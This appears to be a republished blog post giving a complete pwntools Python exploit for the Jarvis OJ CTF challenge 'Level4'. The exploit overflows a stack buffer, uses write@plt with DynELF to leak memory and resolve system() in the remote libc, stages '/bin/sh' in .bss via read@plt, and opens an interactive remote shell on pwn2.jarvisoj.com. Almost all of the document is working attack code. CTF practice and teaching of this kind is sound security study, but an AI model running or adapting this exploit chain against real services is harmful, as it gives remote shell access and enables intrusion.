  • Jarvis OJ-Level4

    借助DynELF实现无libc的漏洞利用小结

    #!/usr/bin/env python
    
    # coding:utf-8
    
    from pwn import *
    
    elf = ELF('level4')

    # NOTE(review): the stubs below are resolved through elf.symbols; pwntools
    # also exposes the PLT explicitly as elf.plt['write'] / elf.plt['read'] --
    # confirm that this pwntools version returns the PLT address here and not
    # an unresolved libc symbol, otherwise every ROP frame lands in the wrong place.
    syms = elf.symbols

    write_plt = p32(syms['write'])       # write@plt: 4-byte memory leak primitive
    # Returning into _start restarts the program, so the stack overflow can be
    # triggered again for the next gadget without the process exiting.
    start_addr = p32(syms['_start'])
    read_plt = p32(syms['read'])         # read@plt: stage "/bin/sh" into memory
    # Writable, non-randomised (no PIE) scratch space for the command string.
    data_addr = p32(syms['__bss_start'])

    # 0x88-byte stack buffer plus the 4-byte saved ebp; the next dword written
    # is the saved return address.
    junk = "A" * 0x8c

    Io = remote("pwn2.jarvisoj.com", 9880)
    
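    def leak(addr):
        """DynELF leaker: return the 4 bytes at ``addr`` in the remote process.

        Overflows the stack buffer so the vulnerable function returns into
        write@plt with arguments (1, addr, 4); write's own return address is
        _start, so the program restarts and the overflow can be triggered
        again for the next leak.

        Args:
            addr: absolute address in the target process to read from.

        Returns:
            Exactly 4 bytes of memory at ``addr`` (a str, Python 2).

        Raises:
            Whatever the pwntools tube raises when the remote end closes the
            connection (EOFError), e.g. if the target died mid-leak.
        """
        payload = junk + write_plt + start_addr + p32(1) + p32(addr) + p32(4)
        Io.send(payload)
        # recv(4) returns *up to* 4 bytes as soon as anything arrives; a short
        # read would hand DynELF a truncated word and corrupt every pointer
        # derived from it. recvn blocks until all 4 bytes are in.
        leaked = Io.recvn(4)
        print("[%s] -> [%s] = [%s]" % (hex(addr), hex(u32(leaked)), repr(leaked)))
        return leaked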
    
    
    # leak the address of system()
    
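    # Reuse the binary already parsed above instead of loading ./level4 a second time.
    d = DynELF(leak, elf=elf)

    # DynELF walks the remote link_map / dynamic sections through leak() and
    # documents a None return when the symbol cannot be found; without this
    # check the final ROP chain would be built around p32(None).
    system_addr = d.lookup('system', 'libc')
    if system_addr is None:
        raise RuntimeError("DynELF could not resolve system() in the remote libc")

    print("[system()] -> [%s]" % (hex(system_addr)))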
    
    
    # write /bin/sh
    
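    # read(0, __bss_start, 8): pull the command string from our socket into .bss,
    # then return into _start so the overflow can be triggered once more.
    payload = junk + read_plt + start_addr + p32(0) + data_addr + p32(8)

    Io.send(payload)

    # NOTE(review): if this send coalesces with the previous one and the
    # vulnerable read() accepts more than len(payload) bytes, the string is
    # swallowed by the overflow read and the staging read blocks. The read
    # size is not visible here; pad the payload to that size (or pause
    # briefly) if the exploit is flaky.

    # send /bin/sh -- exactly the 8 bytes requested by p32(8) above, with the
    # NUL terminator included so system() sees the string "/bin/sh" and no
    # leftover bytes remain in the socket for the next read().
    Io.send("/bin/sh\x00")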
    
    
    # call system
    
    # call system("/bin/sh"): return into the leaked system() with the .bss
    # string as its single argument. 0xFFFFFFFF is a throw-away return address
    # for system(); the process crashing after the shell exits is irrelevant.
    ret_after_system = p32(0xFFFFFFFF)
    payload = junk + p32(system_addr) + ret_after_system + data_addr

    Io.send(payload)

    # hand the shell over to the operator
    Io.interactive()
    

      

  • 原文地址:https://www.cnblogs.com/elvirangel/p/6859097.html